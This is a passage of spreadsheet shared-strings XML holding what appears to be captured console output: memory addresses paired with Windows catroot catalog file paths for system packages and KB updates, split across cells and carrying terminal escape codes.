    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Tuner-Drive</t>
  </si>
  <si>
    <t>rs-Package~31</t>
  </si>
  <si>
    <t>0xdf62e8a8</t>
  </si>
  <si>
    <t>0xdf62e9e8</t>
  </si>
  <si>
    <t>0xdf62ebc0</t>
  </si>
  <si>
    <t>0xdf62ef80</t>
  </si>
  <si>
    <t>0xdf62f248</t>
  </si>
  <si>
    <t>5~x86~en-GB~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62f388</t>
  </si>
  <si>
    <t>5~x86~es-ES~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62f560</t>
  </si>
  <si>
    <t>5~x86~el-GR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62f920</t>
  </si>
  <si>
    <t>5~x86~da-DK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62fc38</t>
  </si>
  <si>
    <t>5~x86~cs-CZ~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62fd78</t>
  </si>
  <si>
    <t>5~x86~de-DE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf62fee8</t>
  </si>
  <si>
    <t>5~x86~bg-BG~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf630288</t>
  </si>
  <si>
    <t>5~x86~he-IL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6305a0</t>
  </si>
  <si>
    <t>5~x86~fr-FR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6308b8</t>
  </si>
  <si>
    <t>5~x86~fi-FI~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf630bd0</t>
  </si>
  <si>
    <t>5~x86~et-EE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf630d10</t>
  </si>
  <si>
    <t>5~x86~hi-IN~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf630ee8</t>
  </si>
  <si>
    <t>5~x86~en-US~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf631258</t>
  </si>
  <si>
    <t>5~x86~lt-LT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf631570</t>
  </si>
  <si>
    <t>5~x86~ja-JP~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6316b0</t>
  </si>
  <si>
    <t>5~x86~nl-NL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf631888</t>
  </si>
  <si>
    <t>5~x86~it-IT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf631ba0</t>
  </si>
  <si>
    <t>5~x86~hu-HU~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf631ce0</t>
  </si>
  <si>
    <t>5~x86~ko-KR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf631eb8</t>
  </si>
  <si>
    <t>5~x86~hr-HR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf632288</t>
  </si>
  <si>
    <t>5~x86~pt-PT~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6325a0</t>
  </si>
  <si>
    <t>5~x86~pt-BR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6326e0</t>
  </si>
  <si>
    <t>5~x86~ru-RU~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6328b8</t>
  </si>
  <si>
    <t>5~x86~pl-PL~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf632bd0</t>
  </si>
  <si>
    <t>5~x86~nb-NO~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf632ee8</t>
  </si>
  <si>
    <t>5~x86~lv-LV~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf633248</t>
  </si>
  <si>
    <t>5~x86~th-TH~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf633560</t>
  </si>
  <si>
    <t>5~x86~sr-LATN-CS~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf633878</t>
  </si>
  <si>
    <t>5~x86~sl-SI~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6339b8</t>
  </si>
  <si>
    <t>5~x86~sv-SE~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf633b90</t>
  </si>
  <si>
    <t>5~x86~sk-SK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf633ee8</t>
  </si>
  <si>
    <t>5~x86~ro-RO~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6341e0</t>
  </si>
  <si>
    <t>5~x86~~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf634320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-VirtualPC-L</t>
  </si>
  <si>
    <t>icensing-Pack</t>
  </si>
  <si>
    <t>0xdf6344f8</t>
  </si>
  <si>
    <t>5~x86~zh-TW~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6348b8</t>
  </si>
  <si>
    <t>5~x86~zh-CN~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf634bd0</t>
  </si>
  <si>
    <t>5~x86~uk-UA~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf634d10</t>
  </si>
  <si>
    <t>5~x86~zh-HK~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf634ee8</t>
  </si>
  <si>
    <t>5~x86~tr-TR~7.1.7601.16492.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6351e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-VirtualPC-U</t>
  </si>
  <si>
    <t>SB-RPM-Packag</t>
  </si>
  <si>
    <t>0xdf6354f8</t>
  </si>
  <si>
    <t>0xdf635810</t>
  </si>
  <si>
    <t>5~x86~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf635950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-VirtualXP-L</t>
  </si>
  <si>
    <t>0xdf635b28</t>
  </si>
  <si>
    <t>5~x86~en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf635e40</t>
  </si>
  <si>
    <t>0xdf6361c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WindowsMedi</t>
  </si>
  <si>
    <t>aPlayer-Troub</t>
  </si>
  <si>
    <t>leshooters-</t>
  </si>
  <si>
    <t>Packag</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6364d8</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf636618</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WinOcr-Pack</t>
  </si>
  <si>
    <t>0xdf6367f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WindowsFoun</t>
  </si>
  <si>
    <t>dation-Langua</t>
  </si>
  <si>
    <t>gePack-Pack</t>
  </si>
  <si>
    <t>0xdf636b08</t>
  </si>
  <si>
    <t>0xdf636c48</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf636e20</t>
  </si>
  <si>
    <t>0xdf6371c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WLMS-Packag</t>
  </si>
  <si>
    <t>e-wrapper~31b</t>
  </si>
  <si>
    <t>0xdf6374d8</t>
  </si>
  <si>
    <t>0xdf637618</t>
  </si>
  <si>
    <t>0xdf6377f0</t>
  </si>
  <si>
    <t>0xdf637b28</t>
  </si>
  <si>
    <t>0xdf637e40</t>
  </si>
  <si>
    <t>e~31bf3856ad364e35~x86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf6381e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WMI-SNMP-Pr</t>
  </si>
  <si>
    <t>ovider-Packag</t>
  </si>
  <si>
    <t>5~x86~~6.1.7601.17514.cat_x001B_[0K_x001B_[183G</t>
  </si>
  <si>
    <t>0xdf6384f8</t>
  </si>
  <si>
    <t>0xdf638810</t>
  </si>
  <si>
    <t>0xdf638950</t>
  </si>
  <si>
    <t>0xdf638b28</t>
  </si>
  <si>
    <t>0xdf638ee8</t>
  </si>
  <si>
    <t>0xdf639118</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Xps-Foundat</t>
  </si>
  <si>
    <t>ion-Client-Pa</t>
  </si>
  <si>
    <t>0xdf639258</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\ntph.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf639430</t>
  </si>
  <si>
    <t>0xdf639638</t>
  </si>
  <si>
    <t>0xdf639810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-WMPNetworkS</t>
  </si>
  <si>
    <t>haringService</t>
  </si>
  <si>
    <t>-Package~31</t>
  </si>
  <si>
    <t>bf3856</t>
  </si>
  <si>
    <t>ad364e35~x86~~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf639b28</t>
  </si>
  <si>
    <t>ad364e35~x86~en-US~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf639e40</t>
  </si>
  <si>
    <t>ad364e35~x86~en-US~6.1.7600.16385.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf639f80</t>
  </si>
  <si>
    <t>ad364e35~x86~~6.1.7601.17514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf63a0f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\ntprint.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf63a4d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\ntexe.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf63a618</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem4.CAT_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf63a7f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Networking-MPSSVC-Rules-Enter</t>
  </si>
  <si>
    <t>priseEdition-</t>
  </si>
  <si>
    <t>0xdf63ac68</t>
  </si>
  <si>
    <t>0xdf63ae40</t>
  </si>
  <si>
    <t>0xdf63b6b0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem3.CAT_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf63b7f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_101_for_KB2750841~31b</t>
  </si>
  <si>
    <t>.3.cat</t>
  </si>
  <si>
    <t>0xdf63b950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_111_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf63bc68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_10_for_KB2545698~31bf</t>
  </si>
  <si>
    <t>x86~~6.1.1.</t>
  </si>
  <si>
    <t>3.cat_x001B_</t>
  </si>
  <si>
    <t>0xdf63bdd8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem2.CAT_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf63c1e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_146_for_KB2758857~31b</t>
  </si>
  <si>
    <t>.0.cat</t>
  </si>
  <si>
    <t>0xdf63c320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_149_for_KB2731771~31b</t>
  </si>
  <si>
    <t>.1.cat</t>
  </si>
  <si>
    <t>0xdf63c4f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_146_for_KB2731771~31b</t>
  </si>
  <si>
    <t>0xdf63c638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_147_for_KB2731771~31b</t>
  </si>
  <si>
    <t>0xdf63c810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_142_for_KB4486563~31b</t>
  </si>
  <si>
    <t>.4.cat</t>
  </si>
  <si>
    <t>0xdf63cb28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_141_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf63cee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_13_for_KB2698365~31bf</t>
  </si>
  <si>
    <t>2.cat_x001B_</t>
  </si>
  <si>
    <t>0xdf63d1c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_139_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf63d4d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_138_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf63d618</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_140_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf63d950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_138_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf63db28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_137_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf63de40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_136_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf63e1c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_136_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf63e3c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_137_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf63e5a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_135_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf63e8b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_135_for_KB3172605~31b</t>
  </si>
  <si>
    <t>0xdf63ebd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_134_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf63ed10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_135_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf63eee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_134_for_KB3172605~31b</t>
  </si>
  <si>
    <t>0xdf63f228</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_133_for_KB3172605~31b</t>
  </si>
  <si>
    <t>0xdf63f540</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_132_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf63f680</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_133_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf63f858</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_130_for_KB3172605~31b</t>
  </si>
  <si>
    <t>0xdf63fb28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_132_for_KB3172605~31b</t>
  </si>
  <si>
    <t>0xdf63ff80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_12_for_KB2698365~31bf</t>
  </si>
  <si>
    <t>0xdf6401e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_166_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf640320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_167_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf6404f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_166_for_KB3080149~31b</t>
  </si>
  <si>
    <t>0xdf640810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_165_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf640bd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_15_for_KB2545698~31bf</t>
  </si>
  <si>
    <t>0xdf640ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_151_for_KB2726535~31b</t>
  </si>
  <si>
    <t>0xdf641118</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_169_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf641320</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_16_for_KB3133977~31bf</t>
  </si>
  <si>
    <t>0xdf6414f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_168_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf641810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_168_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf641b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_168_for_KB3068708~31b</t>
  </si>
  <si>
    <t>0xdf641c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_169_for_KB3004375~31b</t>
  </si>
  <si>
    <t>~x86~~6.1.3</t>
  </si>
  <si>
    <t>0xdf641e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_167_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf642028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_116_for_KB3102429~31b</t>
  </si>
  <si>
    <t>~x86~~6.1.2</t>
  </si>
  <si>
    <t>0xdf642298</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_117_for_KB2813347~31b</t>
  </si>
  <si>
    <t>0xdf642888</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_121_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf6429c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_124_for_KB3172605~31b</t>
  </si>
  <si>
    <t>0xdf642d00</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_11_for_KB2729094~31bf</t>
  </si>
  <si>
    <t>x86~~6.1.2.</t>
  </si>
  <si>
    <t>0.cat_x001B_</t>
  </si>
  <si>
    <t>0xdf642ed8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_119_for_KB3184143~31b</t>
  </si>
  <si>
    <t>0xdf643268</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_11_for_KB2698365~31bf</t>
  </si>
  <si>
    <t>0xdf643440</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_116_for_KB2773072~31b</t>
  </si>
  <si>
    <t>.5.cat</t>
  </si>
  <si>
    <t>0xdf643888</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_126_for_KB3172605~31b</t>
  </si>
  <si>
    <t>0xdf643ba0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_125_for_KB3172605~31b</t>
  </si>
  <si>
    <t>0xdf643eb8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_124_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf6441c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_150_for_KB2984972~31b</t>
  </si>
  <si>
    <t>0xdf644300</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_164_for_KB4054518~31b</t>
  </si>
  <si>
    <t>0xdf6444d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_149_for_KB2758857~31b</t>
  </si>
  <si>
    <t>0xdf644810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_149_for_KB2726535~31b</t>
  </si>
  <si>
    <t>0xdf644b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_148_for_KB2726535~31b</t>
  </si>
  <si>
    <t>0xdf644e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_147_for_KB2758857~31b</t>
  </si>
  <si>
    <t>0xdf645268</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_115_for_KB2773072~31b</t>
  </si>
  <si>
    <t>0xdf6459e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_128_for_KB3172605~31b</t>
  </si>
  <si>
    <t>0xdf645d78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_129_for_KB3172605~31b</t>
  </si>
  <si>
    <t>0xdf645eb8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_131_for_KB3172605~31b</t>
  </si>
  <si>
    <t>0xdf646428</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_114_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf646568</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_116_for_KB2813347~31b</t>
  </si>
  <si>
    <t>0xdf646888</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_127_for_KB3172605~31b</t>
  </si>
  <si>
    <t>0xdf646a60</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_123_for_KB3172605~31b</t>
  </si>
  <si>
    <t>0xdf646d78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_122_for_KB3172605~31b</t>
  </si>
  <si>
    <t>0xdf6471c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_17_for_KB4486563~31bf</t>
  </si>
  <si>
    <t>4.cat_x001B_</t>
  </si>
  <si>
    <t>0xdf6474d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_170_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf647618</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_18_for_KB2750841~31bf</t>
  </si>
  <si>
    <t>0xdf647950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_16_for_KB4054518~31bf</t>
  </si>
  <si>
    <t>0xdf647b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_16_for_KB2973112~31bf</t>
  </si>
  <si>
    <t>0xdf647e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_16_for_KB2943357~31bf</t>
  </si>
  <si>
    <t>0xdf648430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_195_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf648570</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_197_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf648748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_194_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf648a60</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_190_for_KB3004375~31b</t>
  </si>
  <si>
    <t>0xdf648c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_196_for_KB4486563~31b</t>
  </si>
  <si>
    <t>0xdf648e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_188_for_KB3004375~31b</t>
  </si>
  <si>
    <t>0xdf649118</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2547666~31bf3</t>
  </si>
  <si>
    <t>0xdf649430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2532531~31bf3</t>
  </si>
  <si>
    <t>0xdf649810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2506928~31bf3</t>
  </si>
  <si>
    <t>86~~6.1.2.0</t>
